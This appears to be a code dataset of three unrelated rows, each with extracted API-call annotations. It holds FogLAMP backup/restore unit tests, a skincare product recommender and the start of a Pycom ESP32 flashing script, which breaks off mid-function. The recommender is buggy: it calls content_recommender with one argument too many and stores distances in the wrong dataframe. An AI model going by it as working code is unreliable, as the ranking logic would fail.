assert 500 == resp.status
assert "Internal Server Error" == resp.reason
async def test_create_backup(self, client):
async def mock_create():
return "running_or_failed"
storage_client_mock = MagicMock(StorageClientAsync)
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'create_backup', return_value=mock_create()):
resp = await client.post('/foglamp/backup')
assert 200 == resp.status
assert '{"status": "running_or_failed"}' == await resp.text()
async def test_create_backup_exception(self, client):
with patch.object(connect, 'get_storage_async', return_value=Exception):
with patch.object(Backup, 'create_backup', return_value=Exception):
resp = await client.post('/foglamp/backup')
assert 500 == resp.status
assert "Internal Server Error" == resp.reason
async def test_get_backup_details(self, client):
storage_client_mock = MagicMock(StorageClientAsync)
response = {'id': 1, 'file_name': '1.dump', 'ts': '2018-02-15 15:18:41.821978+05:30',
'status': '2', 'type': '1', 'exit_code': '0'}
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'get_backup_details', return_value=mock_coro(response)):
resp = await client.get('/foglamp/backup/{}'.format(1))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert 3 == len(json_response)
assert Counter({"id", "date", "status"}) == Counter(json_response.keys())
@pytest.mark.parametrize("input_exception, response_code, response_message", [
(exceptions.DoesNotExist, 404, "Backup id 8 does not exist"),
(Exception, 500, "Internal Server Error")
])
async def test_get_backup_details_exceptions(self, client, input_exception, response_code, response_message):
storage_client_mock = MagicMock(StorageClientAsync)
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'get_backup_details', side_effect=input_exception):
resp = await client.get('/foglamp/backup/{}'.format(8))
assert response_code == resp.status
assert response_message == resp.reason
async def test_get_backup_details_bad_data(self, client):
resp = await client.get('/foglamp/backup/{}'.format('BLA'))
assert 400 == resp.status
assert "Invalid backup id" == resp.reason
async def test_delete_backup(self, client):
storage_client_mock = MagicMock(StorageClientAsync)
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'delete_backup', return_value=mock_coro(None)):
resp = await client.delete('/foglamp/backup/{}'.format(1))
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'message': 'Backup deleted successfully'} == json_response
@pytest.mark.parametrize("input_exception, response_code, response_message", [
(exceptions.DoesNotExist, 404, "Backup id 8 does not exist"),
(Exception, 500, "Internal Server Error")
])
async def test_delete_backup_exceptions(self, client, input_exception, response_code, response_message):
storage_client_mock = MagicMock(StorageClientAsync)
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'delete_backup', side_effect=input_exception):
resp = await client.delete('/foglamp/backup/{}'.format(8))
assert response_code == resp.status
assert response_message == resp.reason
async def test_delete_backup_bad_data(self, client):
resp = await client.delete('/foglamp/backup/{}'.format('BLA'))
assert 400 == resp.status
assert "Invalid backup id" == resp.reason
async def test_get_backup_status(self, client):
resp = await client.get('/foglamp/backup/status')
assert 200 == resp.status
result = await resp.text()
json_response = json.loads(result)
assert {'backupStatus': [{'index': 1, 'name': 'RUNNING'},
{'index': 2, 'name': 'COMPLETED'},
{'index': 3, 'name': 'CANCELED'},
{'index': 4, 'name': 'INTERRUPTED'},
{'index': 5, 'name': 'FAILED'},
{'index': 6, 'name': 'RESTORED'}]} == json_response
@pytest.mark.parametrize("input_exception, response_code, response_message", [
(ValueError, 400, "Invalid backup id"),
(exceptions.DoesNotExist, 404, "Backup id 8 does not exist"),
(Exception, 500, "Internal Server Error")
])
async def test_get_backup_download_exceptions(self, client, input_exception, response_code, response_message):
storage_client_mock = MagicMock(StorageClientAsync)
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'get_backup_details', side_effect=input_exception):
resp = await client.get('/foglamp/backup/{}/download'.format(8))
assert response_code == resp.status
assert response_message == resp.reason
async def test_get_backup_download(self, client):
storage_client_mock = MagicMock(StorageClientAsync)
response = {'id': 1, 'file_name': '/usr/local/foglamp/data/backup/foglamp.db', 'ts': '2018-02-15 15:18:41',
'status': '2', 'type': '1'}
with patch("aiohttp.web.FileResponse", return_value=web.FileResponse(path=os.path.realpath(__file__))) as file_res:
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Backup, 'get_backup_details', return_value=mock_coro(response)) as patch_backup_detail:
with patch('tarfile.open'):
resp = await client.get('/foglamp/backup/{}/download'.format(1))
assert 200 == resp.status
assert 'OK' == resp.reason
patch_backup_detail.assert_called_once_with(1)
assert 1 == file_res.call_count
@pytest.allure.feature("unit")
@pytest.allure.story("api", "restore")
class TestRestore:
"""Unit test the Restore functionality"""
@pytest.fixture
def client(self, loop, test_client):
app = web.Application(loop=loop)
# fill the routes table
routes.setup(app)
return loop.run_until_complete(test_client(app))
async def test_restore_backup(self, client):
async def mock_restore():
return "running"
storage_client_mock = MagicMock(StorageClientAsync)
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Restore, 'restore_backup', return_value=mock_restore()):
resp = await client.put('/foglamp/backup/{}/restore'.format(1))
assert 200 == resp.status
r = await resp.text()
assert {'status': 'running'} == json.loads(r)
@pytest.mark.parametrize("backup_id, input_exception, code, message", [
(8, exceptions.DoesNotExist, 404, "Backup with 8 does not exist"),
(2, Exception, 500, "Internal Server Error"),
('blah', ValueError, 400, 'Invalid backup id')
])
async def test_restore_backup_exceptions(self, client, backup_id, input_exception, code, message):
storage_client_mock = MagicMock(StorageClientAsync)
with patch.object(connect, 'get_storage_async', return_value=storage_client_mock):
with patch.object(Restore, 'restore_backup', side_effect=input_exception):
resp = await client.put('/foglamp/backup/{}/restore'.format(backup_id))
assert code == resp.status
assert message == resp.reason
| [
"json.loads",
"pytest.allure.feature",
"unittest.mock.MagicMock",
"aiohttp.web.Application",
"foglamp.services.core.api.backup_restore._get_status",
"pytest.allure.story",
"collections.Counter",
"pytest.mark.parametrize",
"os.path.realpath",
"unittest.mock.patch.object",
"foglamp.services.core.routes.setup",
"unittest.mock.patch"
]
| [((885, 914), 'pytest.allure.feature', 'pytest.allure.feature', (['"""unit"""'], {}), "('unit')\n", (906, 914), False, 'import pytest\n'), ((916, 952), 'pytest.allure.story', 'pytest.allure.story', (['"""api"""', '"""backup"""'], {}), "('api', 'backup')\n", (935, 952), False, 'import pytest\n'), ((10456, 10485), 'pytest.allure.feature', 'pytest.allure.feature', (['"""unit"""'], {}), "('unit')\n", (10477, 10485), False, 'import pytest\n'), ((10487, 10524), 'pytest.allure.story', 'pytest.allure.story', (['"""api"""', '"""restore"""'], {}), "('api', 'restore')\n", (10506, 10524), False, 'import pytest\n'), ((1244, 1420), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""input_data, expected"""', "[(1, 'RUNNING'), (2, 'COMPLETED'), (3, 'CANCELED'), (4, 'INTERRUPTED'), (5,\n 'FAILED'), (6, 'RESTORED'), (7, 'UNKNOWN')]"], {}), "('input_data, expected', [(1, 'RUNNING'), (2,\n 'COMPLETED'), (3, 'CANCELED'), (4, 'INTERRUPTED'), (5, 'FAILED'), (6,\n 'RESTORED'), (7, 'UNKNOWN')])\n", (1267, 1420), False, 'import pytest\n'), ((1600, 1873), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""request_params"""', "['', '?limit=1', '?skip=1', '?status=completed', '?status=failed',\n '?status=restored&skip=10', '?status=running&limit=1',\n '?status=canceled&limit=10&skip=0', '?status=interrupted&limit=&skip=',\n '?status=&limit=&skip=']"], {}), "('request_params', ['', '?limit=1', '?skip=1',\n '?status=completed', '?status=failed', '?status=restored&skip=10',\n '?status=running&limit=1', '?status=canceled&limit=10&skip=0',\n '?status=interrupted&limit=&skip=', '?status=&limit=&skip='])\n", (1623, 1873), False, 'import pytest\n'), ((2846, 3240), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""request_params, response_code, response_message"""', '[(\'?limit=invalid\', 400, \'Limit must be a positive integer\'), (\'?limit=-1\',\n 400, \'Limit must be a positive integer\'), (\'?skip=invalid\', 400,\n \'Skip/Offset must be a positive integer\'), (\'?skip=-1\', 400,\n \'Skip/Offset must be a positive integer\'), (\'?status=BLA\', 400,\n "\'BLA\' is not a valid status")]'], {}), '(\'request_params, response_code, response_message\',\n [(\'?limit=invalid\', 400, \'Limit must be a positive integer\'), (\n \'?limit=-1\', 400, \'Limit must be a positive integer\'), (\'?skip=invalid\',\n 400, \'Skip/Offset must be a positive integer\'), (\'?skip=-1\', 400,\n \'Skip/Offset must be a positive integer\'), (\'?status=BLA\', 400,\n "\'BLA\' is not a valid status")])\n', (2869, 3240), False, 'import pytest\n'), ((5559, 5750), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""input_exception, response_code, response_message"""', "[(exceptions.DoesNotExist, 404, 'Backup id 8 does not exist'), (Exception, \n 500, 'Internal Server Error')]"], {}), "('input_exception, response_code, response_message',\n [(exceptions.DoesNotExist, 404, 'Backup id 8 does not exist'), (\n Exception, 500, 'Internal Server Error')])\n", (5582, 5750), False, 'import pytest\n'), ((7099, 7290), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""input_exception, response_code, response_message"""', "[(exceptions.DoesNotExist, 404, 'Backup id 8 does not exist'), (Exception, \n 500, 'Internal Server Error')]"], {}), "('input_exception, response_code, response_message',\n [(exceptions.DoesNotExist, 404, 'Backup id 8 does not exist'), (\n Exception, 500, 'Internal Server Error')])\n", (7122, 7290), False, 'import pytest\n'), ((8694, 8924), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""input_exception, response_code, response_message"""', "[(ValueError, 400, 'Invalid backup id'), (exceptions.DoesNotExist, 404,\n 'Backup id 8 does not exist'), (Exception, 500, 'Internal Server Error')]"], {}), "('input_exception, response_code, response_message',\n [(ValueError, 400, 'Invalid backup id'), (exceptions.DoesNotExist, 404,\n 'Backup id 8 does not exist'), (Exception, 500, 'Internal Server Error')])\n", (8717, 8924), False, 'import pytest\n'), ((11388, 11631), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""backup_id, input_exception, code, message"""', "[(8, exceptions.DoesNotExist, 404, 'Backup with 8 does not exist'), (2,\n Exception, 500, 'Internal Server Error'), ('blah', ValueError, 400,\n 'Invalid backup id')]"], {}), "('backup_id, input_exception, code, message', [(8,\n exceptions.DoesNotExist, 404, 'Backup with 8 does not exist'), (2,\n Exception, 500, 'Internal Server Error'), ('blah', ValueError, 400,\n 'Invalid backup id')])\n", (11411, 11631), False, 'import pytest\n'), ((1096, 1122), 'aiohttp.web.Application', 'web.Application', ([], {'loop': 'loop'}), '(loop=loop)\n', (1111, 1122), False, 'from aiohttp import web\n'), ((1163, 1180), 'foglamp.services.core.routes.setup', 'routes.setup', (['app'], {}), '(app)\n', (1175, 1180), False, 'from foglamp.services.core import routes\n'), ((2040, 2069), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (2049, 2069), False, 'from unittest.mock import MagicMock, patch\n'), ((3979, 4008), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (3988, 4008), False, 'from unittest.mock import MagicMock, patch\n'), ((4832, 4861), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (4841, 4861), False, 'from unittest.mock import MagicMock, patch\n'), ((5908, 5937), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (5917, 5937), False, 'from unittest.mock import MagicMock, patch\n'), ((6592, 6621), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (6601, 6621), False, 'from unittest.mock import MagicMock, patch\n'), ((7443, 7472), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (7452, 7472), False, 'from unittest.mock import MagicMock, patch\n'), ((8248, 8266), 'json.loads', 'json.loads', (['result'], {}), '(result)\n', (8258, 8266), False, 'import json\n'), ((9092, 9121), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (9101, 9121), False, 'from unittest.mock import MagicMock, patch\n'), ((9576, 9605), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (9585, 9605), False, 'from unittest.mock import MagicMock, patch\n'), ((10666, 10692), 'aiohttp.web.Application', 'web.Application', ([], {'loop': 'loop'}), '(loop=loop)\n', (10681, 10692), False, 'from aiohttp import web\n'), ((10733, 10750), 'foglamp.services.core.routes.setup', 'routes.setup', (['app'], {}), '(app)\n', (10745, 10750), False, 'from foglamp.services.core import routes\n'), ((10952, 10981), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (10961, 10981), False, 'from unittest.mock import MagicMock, patch\n'), ((11783, 11812), 'unittest.mock.MagicMock', 'MagicMock', (['StorageClientAsync'], {}), '(StorageClientAsync)\n', (11792, 11812), False, 'from unittest.mock import MagicMock, patch\n'), ((1555, 1593), 'foglamp.services.core.api.backup_restore._get_status', 'backup_restore._get_status', (['input_data'], {}), '(input_data)\n', (1581, 1593), False, 'from foglamp.services.core.api import backup_restore\n'), ((2288, 2364), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (2300, 2364), False, 'from unittest.mock import MagicMock, patch\n'), ((3608, 3674), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'Exception'}), "(connect, 'get_storage_async', return_value=Exception)\n", (3620, 3674), False, 'from unittest.mock import MagicMock, patch\n'), ((4022, 4098), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (4034, 4098), False, 'from unittest.mock import MagicMock, patch\n'), ((4436, 4502), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'Exception'}), "(connect, 'get_storage_async', return_value=Exception)\n", (4448, 4502), False, 'from unittest.mock import MagicMock, patch\n'), ((5035, 5111), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (5047, 5111), False, 'from unittest.mock import MagicMock, patch\n'), ((5951, 6027), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (5963, 6027), False, 'from unittest.mock import MagicMock, patch\n'), ((6635, 6711), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (6647, 6711), False, 'from unittest.mock import MagicMock, patch\n'), ((7486, 7562), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (7498, 7562), False, 'from unittest.mock import MagicMock, patch\n'), ((9135, 9211), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (9147, 9211), False, 'from unittest.mock import MagicMock, patch\n'), ((10995, 11071), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (11007, 11071), False, 'from unittest.mock import MagicMock, patch\n'), ((11826, 11902), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (11838, 11902), False, 'from unittest.mock import MagicMock, patch\n'), ((2659, 2677), 'json.loads', 'json.loads', (['result'], {}), '(result)\n', (2669, 2677), False, 'import json\n'), ((4521, 4582), 'unittest.mock.patch.object', 'patch.object', (['Backup', '"""create_backup"""'], {'return_value': 'Exception'}), "(Backup, 'create_backup', return_value=Exception)\n", (4533, 4582), False, 'from unittest.mock import MagicMock, patch\n'), ((5397, 5415), 'json.loads', 'json.loads', (['result'], {}), '(result)\n', (5407, 5415), False, 'import json\n'), ((6046, 6117), 'unittest.mock.patch.object', 'patch.object', (['Backup', '"""get_backup_details"""'], {'side_effect': 'input_exception'}), "(Backup, 'get_backup_details', side_effect=input_exception)\n", (6058, 6117), False, 'from unittest.mock import MagicMock, patch\n'), ((6991, 7009), 'json.loads', 'json.loads', (['result'], {}), '(result)\n', (7001, 7009), False, 'import json\n'), ((7581, 7647), 'unittest.mock.patch.object', 'patch.object', (['Backup', '"""delete_backup"""'], {'side_effect': 'input_exception'}), "(Backup, 'delete_backup', side_effect=input_exception)\n", (7593, 7647), False, 'from unittest.mock import MagicMock, patch\n'), ((9230, 9301), 'unittest.mock.patch.object', 'patch.object', (['Backup', '"""get_backup_details"""'], {'side_effect': 'input_exception'}), "(Backup, 'get_backup_details', side_effect=input_exception)\n", (9242, 9301), False, 'from unittest.mock import MagicMock, patch\n'), ((9912, 9988), 'unittest.mock.patch.object', 'patch.object', (['connect', '"""get_storage_async"""'], {'return_value': 'storage_client_mock'}), "(connect, 'get_storage_async', return_value=storage_client_mock)\n", (9924, 9988), False, 'from unittest.mock import MagicMock, patch\n'), ((11921, 11989), 'unittest.mock.patch.object', 'patch.object', (['Restore', '"""restore_backup"""'], {'side_effect': 'input_exception'}), "(Restore, 'restore_backup', side_effect=input_exception)\n", (11933, 11989), False, 'from unittest.mock import MagicMock, patch\n'), ((2759, 2792), 'collections.Counter', 'Counter', (["{'id', 'date', 'status'}"], {}), "({'id', 'date', 'status'})\n", (2766, 2792), False, 'from collections import Counter\n'), ((5486, 5519), 'collections.Counter', 'Counter', (["{'id', 'date', 'status'}"], {}), "({'id', 'date', 'status'})\n", (5493, 5519), False, 'from collections import Counter\n'), ((11368, 11381), 'json.loads', 'json.loads', (['r'], {}), '(r)\n', (11378, 11381), False, 'import json\n'), ((10137, 10158), 'unittest.mock.patch', 'patch', (['"""tarfile.open"""'], {}), "('tarfile.open')\n", (10142, 10158), False, 'from unittest.mock import MagicMock, patch\n'), ((9853, 9879), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (9869, 9879), False, 'import os\n')] |
from calendar import c
from typing import Dict, List, Union
from zlib import DEF_BUF_SIZE
import json_lines
import numpy as np
import re
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.manifold import TSNE
from sklearn.preprocessing import StandardScaler
import pandas as pd
import json
from scipy.sparse.linalg import svds
from scipy.spatial import distance
import os
import streamlit as st
def preprocess_ingredients(ingredients):
processed_ingredients = []
for i in range(len(ingredients)):
processed_ingredient = re.sub(
r"\(([^)]*)\)|(([0-9]\d{0,2}(\.\d{1,3})*(,\d+)?)(%|mg|units))|(<\/?i>)|(\/.+)|(\\.+)|\[([^\]]*)\]",
"",
ingredients[i],
).strip()
if (
processed_ingredient.lower() == "water"
or processed_ingredient.lower() == "aqua"
or processed_ingredient.lower() == "eau"
):
processed_ingredient = "Water"
processed_ingredients.append(processed_ingredient)
return processed_ingredients
@st.experimental_memo
def content_recommender(opt, _item1, _item2, _item3, df) -> pd.DataFrame:
content_df = df[df.category == opt]
content_df["ingredients"] = content_df["ingredients"].map(preprocess_ingredients)
mlb = MultiLabelBinarizer()
output = mlb.fit_transform(content_df.ingredients.values)
content_df = content_df.drop(["ingredients"], axis=1)
model = TSNE(n_components=2, learning_rate=200)
tsne_features = model.fit_transform(output)
content_df["X"] = tsne_features[:, 0]
content_df["Y"] = tsne_features[:, 1]
content_df["dist"] = 0.0
item1 = content_df[content_df["product_name"] == _item1]
item2 = content_df[content_df["product_name"] == _item2]
item3 = content_df[content_df["product_name"] == _item3]
p1 = np.array([item1["X"], item1["Y"]]).reshape(1, -1)
p2 = np.array([item2["X"], item2["Y"]]).reshape(1, -1)
p3 = np.array([item3["X"], item3["Y"]]).reshape(1, -1)
for ind, item in content_df.iterrows():
pn = np.array([item.X, item.Y]).reshape(-1, 1)
df.at[ind, "dist"] = min(
distance.chebyshev(p1, pn),
distance.chebyshev(p2, pn),
distance.chebyshev(p3, pn),
)
content_df = content_df[~content_df.product_name.isin([_item1, _item2, _item3])]
content_df = content_df.sort_values("dist")
return content_df
@st.experimental_memo
def collab_recommender(df_tmp, num_recs, username):
reviews = df_tmp.explode("review_data")
reviews["username"] = reviews["review_data"].apply(lambda x: x["UserNickname"])
reviews["rating"] = reviews["review_data"].apply(lambda x: x["Rating"])
grouped_reviews = reviews.groupby("username")["review_data"].apply(list)
multiple_rating_users = set(grouped_reviews[grouped_reviews.map(len) > 1].index)
multi_reviews = reviews[reviews.username.isin(multiple_rating_users)]
products_reviewed_per_user = {u: set() for u in multiple_rating_users}
product_index = dict(zip(df_tmp["url"].values, range(len(df_tmp["url"]))))
username_index = dict(zip(multiple_rating_users, range(len(multiple_rating_users))))
matrix = np.zeros((len(multiple_rating_users), len(df_tmp["url"])))
for user, rating, url in zip(
multi_reviews.username.values,
multi_reviews.rating.values,
multi_reviews.url.values,
):
matrix[username_index[user]][product_index[url]] = rating
products_reviewed_per_user[user].add(url)
ss = StandardScaler()
normatrix = ss.fit_transform(matrix)
print(normatrix)
U, S, V = svds(normatrix)
all_user_predicted_rating = ss.inverse_transform(U @ np.diag(S) @ V)
preds_df = pd.DataFrame(
all_user_predicted_rating, columns=product_index, index=username_index
)
sorted_user_preds = preds_df.loc[username].sort_values(ascending=False)
sorted_user_preds = sorted_user_preds[
~sorted_user_preds.index.isin(products_reviewed_per_user[username])
]
sorted_user_preds = sorted_user_preds.head(num_recs)
# we want those that they haven't already tested
collab_df = pd.merge(
df_tmp,
sorted_user_preds.to_frame(),
left_on="url",
right_index=True,
how="right",
)
collab_df.rename(columns={username: "pred_rating"}, inplace=True)
return collab_df
if __name__ == "__main__":
file_path = os.path.dirname(__file__)
if file_path != "":
os.chdir(file_path)
products: List[Dict[str, Union[str, List[str]]]] = []
# input data into List
with open("../cbscraper/product_urls_with_reviews.jsonlines", "rb") as f:
unique = set()
lines = f.read().splitlines()
df_inter = pd.DataFrame(lines)
df_inter.columns = ["json_element"]
df_inter["json_element"].apply(json.loads)
df = pd.json_normalize(df_inter["json_element"].apply(json.loads))
# to save myself if i do something dumb and run the scraper without deleting the .jsonlines file
df.drop_duplicates(subset=["url"], inplace=True)
# option: category of product, eg cleanser
categories = set(df.category.values)
# filter data by given option
print("Hello world!")
print("Welcome!")
print(categories)
print("pls enter the category:")
cat = str(input())
display_product_names = df[df.category == cat]
print(display_product_names[["brand", "product_name"]])
print("pls enter your top 3 products indices, separated by a new line")
item1 = int(input())
item2 = int(input())
item3 = int(input())
print("pls enter # of recs:")
num_recs = int(input())
reviews = display_product_names.explode("review_data")
reviews["username"] = reviews["review_data"].apply(lambda x: x["UserNickname"])
grouped_reviews = reviews.groupby("username")["review_data"].apply(list)
multiple_rating_users = set(grouped_reviews[grouped_reviews.map(len) > 1].index)
print(multiple_rating_users)
print("pls enter sephora userid, if you don't have one just enter 'none':")
username = str(input())
if username == "none":
print("your ingredients based recommendations are:")
cbf = content_recommender(
cat,
df.product_name.values[item1],
df.product_name.values[item2],
df.product_name.values[item3],
num_recs,
df,
)
print(cbf[["brand", "product_name", "url", "avg_rating"]])
else:
cbf = content_recommender(
cat,
df.product_name.values[item1],
df.product_name.values[item2],
df.product_name.values[item3],
num_recs + 10,
df,
)
cf = collab_recommender(cbf, num_recs, username)
print("your hybrid recommendations are:")
print(cf[["brand", "product_name", "url", "pred_rating"]])
print("thank u for using this service :)")
| [
"sklearn.manifold.TSNE",
"numpy.diag",
"sklearn.preprocessing.StandardScaler",
"os.path.dirname",
"os.chdir",
"numpy.array",
"scipy.sparse.linalg.svds",
"scipy.spatial.distance.chebyshev",
"pandas.DataFrame",
"re.sub",
"sklearn.preprocessing.MultiLabelBinarizer"
]
| [((1288, 1309), 'sklearn.preprocessing.MultiLabelBinarizer', 'MultiLabelBinarizer', ([], {}), '()\n', (1307, 1309), False, 'from sklearn.preprocessing import MultiLabelBinarizer\n'), ((1442, 1481), 'sklearn.manifold.TSNE', 'TSNE', ([], {'n_components': '(2)', 'learning_rate': '(200)'}), '(n_components=2, learning_rate=200)\n', (1446, 1481), False, 'from sklearn.manifold import TSNE\n'), ((3533, 3549), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (3547, 3549), False, 'from sklearn.preprocessing import StandardScaler\n'), ((3626, 3641), 'scipy.sparse.linalg.svds', 'svds', (['normatrix'], {}), '(normatrix)\n', (3630, 3641), False, 'from scipy.sparse.linalg import svds\n'), ((3731, 3820), 'pandas.DataFrame', 'pd.DataFrame', (['all_user_predicted_rating'], {'columns': 'product_index', 'index': 'username_index'}), '(all_user_predicted_rating, columns=product_index, index=\n username_index)\n', (3743, 3820), True, 'import pandas as pd\n'), ((4434, 4459), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (4449, 4459), False, 'import os\n'), ((4492, 4511), 'os.chdir', 'os.chdir', (['file_path'], {}), '(file_path)\n', (4500, 4511), False, 'import os\n'), ((4756, 4775), 'pandas.DataFrame', 'pd.DataFrame', (['lines'], {}), '(lines)\n', (4768, 4775), True, 'import pandas as pd\n'), ((1838, 1872), 'numpy.array', 'np.array', (["[item1['X'], item1['Y']]"], {}), "([item1['X'], item1['Y']])\n", (1846, 1872), True, 'import numpy as np\n'), ((1897, 1931), 'numpy.array', 'np.array', (["[item2['X'], item2['Y']]"], {}), "([item2['X'], item2['Y']])\n", (1905, 1931), True, 'import numpy as np\n'), ((1956, 1990), 'numpy.array', 'np.array', (["[item3['X'], item3['Y']]"], {}), "([item3['X'], item3['Y']])\n", (1964, 1990), True, 'import numpy as np\n'), ((2152, 2178), 'scipy.spatial.distance.chebyshev', 'distance.chebyshev', (['p1', 'pn'], {}), '(p1, pn)\n', (2170, 2178), False, 'from scipy.spatial import distance\n'), ((2192, 2218), 'scipy.spatial.distance.chebyshev', 'distance.chebyshev', (['p2', 'pn'], {}), '(p2, pn)\n', (2210, 2218), False, 'from scipy.spatial import distance\n'), ((2232, 2258), 'scipy.spatial.distance.chebyshev', 'distance.chebyshev', (['p3', 'pn'], {}), '(p3, pn)\n', (2250, 2258), False, 'from scipy.spatial import distance\n'), ((554, 702), 're.sub', 're.sub', (['"""\\\\(([^)]*)\\\\)|(([0-9]\\\\d{0,2}(\\\\.\\\\d{1,3})*(,\\\\d+)?)(%|mg|units))|(<\\\\/?i>)|(\\\\/.+)|(\\\\\\\\.+)|\\\\[([^\\\\]]*)\\\\]"""', '""""""', 'ingredients[i]'], {}), "(\n '\\\\(([^)]*)\\\\)|(([0-9]\\\\d{0,2}(\\\\.\\\\d{1,3})*(,\\\\d+)?)(%|mg|units))|(<\\\\/?i>)|(\\\\/.+)|(\\\\\\\\.+)|\\\\[([^\\\\]]*)\\\\]'\n , '', ingredients[i])\n", (560, 702), False, 'import re\n'), ((2064, 2090), 'numpy.array', 'np.array', (['[item.X, item.Y]'], {}), '([item.X, item.Y])\n', (2072, 2090), True, 'import numpy as np\n'), ((3699, 3709), 'numpy.diag', 'np.diag', (['S'], {}), '(S)\n', (3706, 3709), True, 'import numpy as np\n')] |
#!/usr/bin/env python
#
# Copyright (c) 2018, Pycom Limited.
#
# This software is licensed under the GNU GPL version 3 or any
# later version, with permitted additional terms. For more information
# see the Pycom Licence v1.0 document supplied with this file, or
# available at https://www.pycom.io/opensource/licensing
#
"""
Flash the ESP32 (bootloader, partitions table and factory app).
How to call esptool:
python esptool.py '--chip', 'esp32', '--port', /dev/ttyUSB0, '--baud', '921600', 'write_flash', '-z', '--flash_mode', 'dio', '--flash_freq', '40m', '--flash_size', 'detect', '0x1000', bootloader.bin, '0x8000', partitions.bin, '0x10000', application.bin, '0x3FF000', 'config_no_wifi.bin'
"""
from esptool import ESP32ROM
import os
import sys
import struct
import sqlite3
import argparse
import subprocess
import threading
import time
import fw_version
import csv
working_threads = {}
macs_db = None
wmacs = {}
DB_MAC_UNUSED = 0
DB_MAC_ERROR = -1
DB_MAC_LOCK = -2
DB_MAC_OK = 1
def open_macs_db(db_filename):
global macs_db
if not os.path.exists(db_filename):
print("MAC addresses database not found")
sys.exit(1)
macs_db = sqlite3.connect(db_filename)
def fetch_MACs(number):
return [x[0].encode('ascii', 'ignore') for x in macs_db.execute("select mac from macs where status = 0 order by rowid asc limit ?", (number,)).fetchall()]
def set_mac_status(mac, wmac, status):
macs_db.execute("update macs set status = ?, last_touch = strftime('%s','now'), wmac = ? where mac = ?", (status, wmac, mac))
macs_db.commit()
def print_exception(e):
print ('Exception: {}, on line {}'.format(e, sys.exc_info()[-1].tb_lineno))
def erase_flash(port, command):
global working_threads
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
num_erases = 0
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'Chip erase completed successfully' in nextline:
sys.stdout.write('Board erased OK on port %s\n' % port)
num_erases += 1
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0 or num_erases != 1:
working_threads[port] = None
def read_wlan_mac(port, command):
global working_threads
global wmacs
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
mac_read = False
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'MAC: ' in nextline:
wmacs[port] = nextline[5:-1].replace(":", "-").upper()
